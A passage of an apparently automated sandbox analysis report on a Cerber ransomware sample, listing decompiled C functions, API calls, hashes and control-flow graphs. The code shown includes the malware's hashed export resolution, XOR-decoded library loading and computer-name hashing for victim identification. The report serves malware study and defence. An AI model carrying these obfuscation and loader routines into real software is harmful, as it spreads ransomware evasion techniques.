                                                                                                                                                                                          • Part of subcall function 004052DB: HeapSetInformation.KERNEL32(00000000,00000000,00000000,00000004,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 00405316
                                                                                                                                                                                          • Part of subcall function 004052DB: GetCurrentProcessId.KERNEL32(?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?), ref: 0040531C
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$CurrentErrorLastProcess$AllocateCreateInformationmemset
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3762545016-0
                                                                                                                                                                                        • Opcode ID: f8a36282de33a118b0e3e3b4a1a5650a6279c3d7d066af10e21ffce48dc56cd7
                                                                                                                                                                                        • Instruction ID: ce92fe84d581c274f0df690b864ad1bc2663d76769bd6b62b0cd724ef4544cd3
                                                                                                                                                                                        • Opcode Fuzzy Hash: f8a36282de33a118b0e3e3b4a1a5650a6279c3d7d066af10e21ffce48dc56cd7
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7601A732500605ABCB206BA5DD45B9B7BACDF44388F00407EFC01F2191EBB9D9089E5C
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                        			E004052DB(void* __ecx) {
                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                        				void* _t4;
                                                                                                                                                                                        				long _t6;
                                                                                                                                                                                        
                                                                                                                                                                                        				if(E0040521D() == 0) {
                                                                                                                                                                                        					L2:
                                                                                                                                                                                        					_t4 = HeapCreate(0, 0, 0); // executed
                                                                                                                                                                                        					 *0x42f808 = _t4;
                                                                                                                                                                                        					if(_t4 != 0) {
                                                                                                                                                                                        						_v8 = 2;
                                                                                                                                                                                        						 *0x40f25c(_t4, 0,  &_v8, 4);
                                                                                                                                                                                        						_t6 = GetCurrentProcessId();
                                                                                                                                                                                        						 *0x42f80c = _t6;
                                                                                                                                                                                        						return _t6;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t4 = E0040528D();
                                                                                                                                                                                        					if(_t4 == 0) {
                                                                                                                                                                                        						goto L2;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                        			}







                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0040521D: GetCurrentProcessId.KERNEL32(0040534D,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000), ref: 0040521D
                                                                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00000000,00000000,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 004052F7
                                                                                                                                                                                        • HeapSetInformation.KERNEL32(00000000,00000000,00000000,00000004,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 00405316
                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?), ref: 0040531C
                                                                                                                                                                                          • Part of subcall function 0040528D: GetProcessHeaps.KERNEL32(000000FF,?,?,00000000), ref: 004052AC
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Process$CurrentHeap$CreateHeapsInformation
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3179415709-0
                                                                                                                                                                                        • Opcode ID: f4d2fe047154c820b9d04e58fef47c53acbd2844d057b6373e8296822e6be4ef
                                                                                                                                                                                        • Instruction ID: 23e59799b477871dd03203e7d772dc5f3eff58e84d09700a679526b41974071e
                                                                                                                                                                                        • Opcode Fuzzy Hash: f4d2fe047154c820b9d04e58fef47c53acbd2844d057b6373e8296822e6be4ef
                                                                                                                                                                                        • Instruction Fuzzy Hash: BEE0E574140704AADB20AF61ED06B5777A4EB05745F9040BDFA01B62E1DBB595088E6D
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 61 4d9ff30-4d9ffa2 call 4da0310 call 4d9fd20 VirtualAlloc
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 04D9FF9C
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.328304291.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_4d70000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                        • String ID: VirtualAlloc
                                                                                                                                                                                        • API String ID: 4275171209-164498762
                                                                                                                                                                                        • Opcode ID: f30858d0a422aae06dd199b9a003870d7df03182a4f3850dc3e6dcbbe834f4c4
                                                                                                                                                                                        • Instruction ID: 435b5f1d71f39e2e4aadb5e9bc5d59e5d3afcb592c1f684256396892bf0cdb3a
                                                                                                                                                                                        • Opcode Fuzzy Hash: f30858d0a422aae06dd199b9a003870d7df03182a4f3850dc3e6dcbbe834f4c4
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9701DE60D082CDEAEF01D7E88409BEFBFB55F15704F044098D5846B282D6BA575887B6
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 04DA04C5
                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 04DA05A1
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.328304291.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_4d70000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                        • Opcode ID: f0fc7789056491e0bcd13214261481ad261569ee2317a91b5abc443da0f3d989
                                                                                                                                                                                        • Instruction ID: dd9d1d701bab1e2349b934f70b9f889323a8617e50c6cd2475b48747b926853b
                                                                                                                                                                                        • Opcode Fuzzy Hash: f0fc7789056491e0bcd13214261481ad261569ee2317a91b5abc443da0f3d989
                                                                                                                                                                                        • Instruction Fuzzy Hash: DC91BAB5A00209DFDB08CF94C594EAEB7B5FF88304F248159E909AB341D775EE92CB94
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 103 4050bf-4050d3 104 4050d5-4050d7 103->104 105 4050dc-4050e6 103->105 108 4051d2-4051d8 104->108 106 4051d0 105->106 107 4050ec-4050ff 105->107 106->108 107->106 109 405105-40510a 107->109 109->106 110 405110-40511d 109->110 111 40512a-40512e 110->111 112 40511f-405125 110->112 114 405130-405134 111->114 115 405136-405144 call 40507c call 404ef9 111->115 113 4051e3-4051e6 112->113 116 405174 113->116 117 4051e8-4051f3 113->117 118 405148-40514d 114->118 115->118 120 405176-405178 116->120 117->120 118->116 122 40514f-40516c call 40507c call 404ef9 118->122 120->106 123 40517a-405185 120->123 133 4051d9-4051df 122->133 134 40516e-405172 122->134 123->106 126 405187-40518b 123->126 126->104 129 405191-4051ad call 40508c call 4050a5 126->129 129->106 138 4051af-4051bd LoadLibraryExA 129->138 133->113 134->116 134->122 138->106 139 4051bf-4051ce call 4050bf 138->139 139->106
                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E004050BF(intOrPtr* _a4, signed short _a8, signed int _a12, signed int _a16) {
                                                                                                                                                                                        				char _v132;
                                                                                                                                                                                        				intOrPtr* _v136;
                                                                                                                                                                                        				signed short _v140;
                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                                        				intOrPtr _t45;
                                                                                                                                                                                        				struct HINSTANCE__* _t53;
                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                        				signed int _t60;
                                                                                                                                                                                        				void* _t64;
                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                        				signed short _t69;
                                                                                                                                                                                        				intOrPtr* _t81;
                                                                                                                                                                                        				signed int _t85;
                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t81 = _a4;
                                                                                                                                                                                        				if(_t81 != 0) {
                                                                                                                                                                                        					_t64 = 0;
                                                                                                                                                                                        					__eflags =  *_t81 - 0x5a4d;
                                                                                                                                                                                        					if( *_t81 != 0x5a4d) {
                                                                                                                                                                                        						L20:
                                                                                                                                                                                        						_t38 = _t64;
                                                                                                                                                                                        						L21:
                                                                                                                                                                                        						return _t38;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t40 =  *((intOrPtr*)(_t81 + 0x3c)) + _t81 + 4;
                                                                                                                                                                                        					_v136 = _t40;
                                                                                                                                                                                        					__eflags =  *_t40 - 0x14c;
                                                                                                                                                                                        					if( *_t40 != 0x14c) {
                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t85 =  *(_t40 + 0x74);
                                                                                                                                                                                        					__eflags = _t85;
                                                                                                                                                                                        					if(_t85 == 0) {
                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t69 = _a8;
                                                                                                                                                                                        					_t86 = _t85 + _t81;
                                                                                                                                                                                        					__eflags = _t69 >> 0x10;
                                                                                                                                                                                        					if(_t69 >> 0x10 != 0) {
                                                                                                                                                                                        						__eflags = _a12 & 0x00000001;
                                                                                                                                                                                        						if((_a12 & 0x00000001) == 0) {
                                                                                                                                                                                        							_v140 = E00404EF9(_t69, E0040507C(_t69));
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							_v140 = _t69;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t66 = 0;
                                                                                                                                                                                        						__eflags =  *(_t86 + 0x18);
                                                                                                                                                                                        						if( *(_t86 + 0x18) <= 0) {
                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                        								_t57 = E00404EF9( *((intOrPtr*)(_t81 + _t66 * 4 +  *((intOrPtr*)(_t86 + 0x20)))) + _t81, E0040507C( *((intOrPtr*)(_t81 + _t66 * 4 +  *((intOrPtr*)(_t86 + 0x20)))) + _t81));
                                                                                                                                                                                        								__eflags = _v140 - _t57;
                                                                                                                                                                                        								if(_v140 == _t57) {
                                                                                                                                                                                        									break;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t66 = _t66 + 1;
                                                                                                                                                                                        								__eflags = _t66 -  *(_t86 + 0x18);
                                                                                                                                                                                        								if(_t66 <  *(_t86 + 0x18)) {
                                                                                                                                                                                        									continue;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								goto L13;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t60 =  *( *((intOrPtr*)(_t86 + 0x24)) + _t66 * 2 + _t81) & 0x0000ffff;
                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_t60 = (_t69 & 0x0000ffff) -  *((intOrPtr*)(_t86 + 0x10));
                                                                                                                                                                                        						L23:
                                                                                                                                                                                        						__eflags = _t60 - 0xffffffff;
                                                                                                                                                                                        						if(_t60 == 0xffffffff) {
                                                                                                                                                                                        							L13:
                                                                                                                                                                                        							_t64 = 0;
                                                                                                                                                                                        							__eflags = 0;
                                                                                                                                                                                        							L14:
                                                                                                                                                                                        							__eflags = _t64 - _t86;
                                                                                                                                                                                        							if(_t64 < _t86) {
                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t45 = _v136;
                                                                                                                                                                                        							__eflags = _t64 -  *((intOrPtr*)(_t45 + 0x78)) + _t86;
                                                                                                                                                                                        							if(_t64 >=  *((intOrPtr*)(_t45 + 0x78)) + _t86) {
                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							__eflags = _a16;
                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                        								goto L1;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							E0040508C(_t64, __eflags,  &_v132);
                                                                                                                                                                                        							_t64 = 0;
                                                                                                                                                                                        							_t87 = E004050A5( &_v132);
                                                                                                                                                                                        							__eflags = _t87;
                                                                                                                                                                                        							if(_t87 != 0) {
                                                                                                                                                                                        								 *_t87 = 0; // executed
                                                                                                                                                                                        								_t53 = LoadLibraryExA( &_v132, 0, 0);
                                                                                                                                                                                        								__eflags = _t53;
                                                                                                                                                                                        								if(_t53 != 0) {
                                                                                                                                                                                        									__eflags = _t87 + 1;
                                                                                                                                                                                        									_t64 = E004050BF(_t53, _t87 + 1, 0, _a16);
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t64 =  *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x1c)) + _t60 * 4 + _t81)) + _t81;
                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				L1:
                                                                                                                                                                                        				_t38 = 0;
                                                                                                                                                                                        				goto L21;
                                                                                                                                                                                        			}




















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 004051B8
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                                        • Opcode ID: 4800137a6d0576019bf18e3e223d368e835cbaabb2d3a25ea0341b9291db0bb8
                                                                                                                                                                                        • Instruction ID: c6742ce8dd1339212489777c70171deb5d259b5c48844efc6f8ab68823c637eb
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4800137a6d0576019bf18e3e223d368e835cbaabb2d3a25ea0341b9291db0bb8
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5831D471A00A058FC724DE28C8C0A6B73E4FB44314F10063EE855AB2D2EB78DD44CBA9
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 142 4da0200-4da0228 143 4da022e-4da0234 142->143 144 4da02d7-4da02da 142->144 145 4da0237-4da023e 143->145 145->144 146 4da0244-4da0266 LoadLibraryExA 145->146 147 4da0269-4da026f 146->147 148 4da02c9-4da02d2 147->148 149 4da0271-4da027b 147->149 148->145 150 4da029a-4da02b3 149->150 151 4da027d-4da0298 149->151 154 4da02b6-4da02c7 150->154 151->154 154->147
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 04DA0258
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.328304291.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_4d70000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                                        • Opcode ID: a2c2d76fb87602c03bfdf45c71e65d7c2dc1016122473ecb74e563991d5f964e
                                                                                                                                                                                        • Instruction ID: ac4ee4a6cd3cd1122e291ef9f1cf9d4b5f7612b9addf927d6320cf223a03580c
                                                                                                                                                                                        • Opcode Fuzzy Hash: a2c2d76fb87602c03bfdf45c71e65d7c2dc1016122473ecb74e563991d5f964e
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C31A875A01209DFCB09CF98C880AADB7B5FF8C314F14C299D819AB355D735AA51CF90
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 155 402e39-402e56 GetComputerNameA 156 402ef9-402efa 155->156 157 402e5c-402e86 call 405905 call 405b59 155->157 157->156 162 402e88-402e92 call 40ad86 157->162 164 402e97-402e9c 162->164 165 402ef3-402ef8 call 405463 164->165 166 402e9e-402ef0 call 40591c call 405a8e 164->166 165->156 166->165
                                                                                                                                                                                        C-Code - Quality: 31%
                                                                                                                                                                                        			E00402E39(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                        				signed char _v13;
                                                                                                                                                                                        				signed char _v14;
                                                                                                                                                                                        				signed char _v15;
                                                                                                                                                                                        				signed char _v16;
                                                                                                                                                                                        				signed char _v17;
                                                                                                                                                                                        				signed char _v18;
                                                                                                                                                                                        				signed char _v19;
                                                                                                                                                                                        				signed char _v20;
                                                                                                                                                                                        				signed short _v22;
                                                                                                                                                                                        				signed short _v24;
                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				int _t23;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t42 = __ecx;
                                                                                                                                                                                        				_t41 = __ebx;
                                                                                                                                                                                        				_v8 = 0x10;
                                                                                                                                                                                        				_t23 = GetComputerNameA( &_v44,  &_v8);
                                                                                                                                                                                        				_t54 = _t23;
                                                                                                                                                                                        				if(_t23 != 0) {
                                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                                        					_push( &_v44);
                                                                                                                                                                                        					_push(E00405905(0x40ced4, 5, 0x7f642c43));
                                                                                                                                                                                        					_push( &_v12);
                                                                                                                                                                                        					_t23 = E00405B59(__ebx, _t42, __edi, __esi, _t54);
                                                                                                                                                                                        					if(_t23 != 0) {
                                                                                                                                                                                        						_push(__esi);
                                                                                                                                                                                        						_t46 = _v12;
                                                                                                                                                                                        						_t27 = E0040AD86( &_v28, _v12, _t23,  &_v28); // executed
                                                                                                                                                                                        						_t56 = _t27;
                                                                                                                                                                                        						if(_t27 != 0) {
                                                                                                                                                                                        							_push(_v13 & 0x000000ff);
                                                                                                                                                                                        							_push(_v14 & 0x000000ff);
                                                                                                                                                                                        							_push(_v15 & 0x000000ff);
                                                                                                                                                                                        							_push(_v16 & 0x000000ff);
                                                                                                                                                                                        							_push(_v17 & 0x000000ff);
                                                                                                                                                                                        							_push(_v18 & 0x000000ff);
                                                                                                                                                                                        							_push(_v19 & 0x000000ff);
                                                                                                                                                                                        							_push(_v20 & 0x000000ff);
                                                                                                                                                                                        							_push(_v22 & 0x0000ffff);
                                                                                                                                                                                        							_push(_v24 & 0x0000ffff);
                                                                                                                                                                                        							_push(_v28);
                                                                                                                                                                                        							_push(E0040591C(0x40d228, 0x3c, 0x1f9ba433));
                                                                                                                                                                                        							_push(_a8);
                                                                                                                                                                                        							E00405A8E(_t41, __edi, _t46, _t56);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						return E00405463(_t46);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t23;
                                                                                                                                                                                        			}


                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetComputerNameA.KERNEL32(?,00000000), ref: 00402E4E
                                                                                                                                                                                          • Part of subcall function 0040AD86: CryptCreateHash.ADVAPI32(00008003,00000000,00000000,00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADAB
                                                                                                                                                                                          • Part of subcall function 0040AD86: CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADBF
                                                                                                                                                                                          • Part of subcall function 0040AD86: CryptGetHashParam.ADVAPI32(00000000,00000002,00402F19,?,00000000,?,?,?,?,00402E97,00402F19,00000000), ref: 0040ADDD
                                                                                                                                                                                          • Part of subcall function 0040AD86: CryptDestroyHash.ADVAPI32(00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADEB
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CryptHash$ComputerCreateDataDestroyNameParam
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1269158035-0
                                                                                                                                                                                        • Opcode ID: 5e7b4764ce86ad89ed88cb807e3ddcd426acfde23c696e854036afa231912a48
                                                                                                                                                                                        • Instruction ID: b50cf408ba8baf7f798fd3c54e054df88dd5bb54a10a58e4a69460bee7ee399a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e7b4764ce86ad89ed88cb807e3ddcd426acfde23c696e854036afa231912a48
                                                                                                                                                                                        • Instruction Fuzzy Hash: BE110DA6C00159BDDF51A7D58D05EFFBBBC9E09205F0800A6FA90F11C2E67C9744ABB5
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 173 40ac91-40aca0 174 40aca2-40acaf 173->174 175 40acb1-40acb7 174->175 176 40acb9-40acd0 LoadLibraryExA 174->176 175->174 175->176 177 40ad11-40ad17 176->177 178 40acd2-40acdc 176->178 178->177 179 40acde-40acf4 call 4050bf 178->179 181 40acf9-40ad00 179->181 182 40ad02-40ad09 181->182 183 40ad0d 181->183 182->179 184 40ad0b 182->184 183->177 184->177
                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E0040AC91(intOrPtr* __edi) {
                                                                                                                                                                                        				void* _v5;
                                                                                                                                                                                        				struct HINSTANCE__* _v12;
                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                        				struct HINSTANCE__* _t19;
                                                                                                                                                                                        				intOrPtr _t22;
                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                        				signed char _t27;
                                                                                                                                                                                        				signed char _t28;
                                                                                                                                                                                        				signed char* _t29;
                                                                                                                                                                                        				intOrPtr* _t32;
                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t29 = __edi;
                                                                                                                                                                                        				_t28 =  *((intOrPtr*)(__edi));
                                                                                                                                                                                        				_t35 = _t34 - 0x110;
                                                                                                                                                                                        				_t24 = 0;
                                                                                                                                                                                        				_t17 = 0;
                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                        					_t27 =  *(_t29 + _t17 + 1) ^ _t28;
                                                                                                                                                                                        					 *(_t33 + _t17 - 0x110) = _t27;
                                                                                                                                                                                        					if(_t27 == 0) {
                                                                                                                                                                                        						break;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t17 = _t17 + 1;
                                                                                                                                                                                        					if(_t17 < 0x104) {
                                                                                                                                                                                        						continue;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					break;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_v5 = _t24;
                                                                                                                                                                                        				_t19 = LoadLibraryExA( &_v276, _t24, _t24); // executed
                                                                                                                                                                                        				_v12 = _t19;
                                                                                                                                                                                        				if(_t19 != _t24) {
                                                                                                                                                                                        					_v5 = 1;
                                                                                                                                                                                        					if( *((intOrPtr*)(_t29 + 0x108)) > _t24) {
                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                        							_t32 =  *((intOrPtr*)( *((intOrPtr*)(_t29 + 0x10c)) + _t24 * 4));
                                                                                                                                                                                        							_t22 = E004050BF(_v12,  *_t32, 1,  *0x40edd0); // executed
                                                                                                                                                                                        							_t35 = _t35 + 0x10;
                                                                                                                                                                                        							 *_t32 = _t22;
                                                                                                                                                                                        							if(_t22 == 0) {
                                                                                                                                                                                        								break;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t24 = _t24 + 1;
                                                                                                                                                                                        							if(_t24 <  *((intOrPtr*)(_t29 + 0x108))) {
                                                                                                                                                                                        								continue;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        							}
                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_v5 = 0;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				L9:
                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                        			}


















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 0040ACC5
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                                        • Opcode ID: 6edc05313b60101953cfe7a05a53b77c0f54885c6c3ebef2d644a023b9ac831c
                                                                                                                                                                                        • Instruction ID: 23337402054ed03b5f3c0123adcbe3b28fa92f0f123e7d1e65809f76e8499c93
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6edc05313b60101953cfe7a05a53b77c0f54885c6c3ebef2d644a023b9ac831c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A01DB309083496FDB119FB88CC47DABBA5FF05304F2408BAD591A3241D27655A48B95
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 185 4066bb-4066c4 186 4066c6-4066e4 call 40ad18 PostMessageW 185->186 187 4066ea-4066ed 185->187 186->187
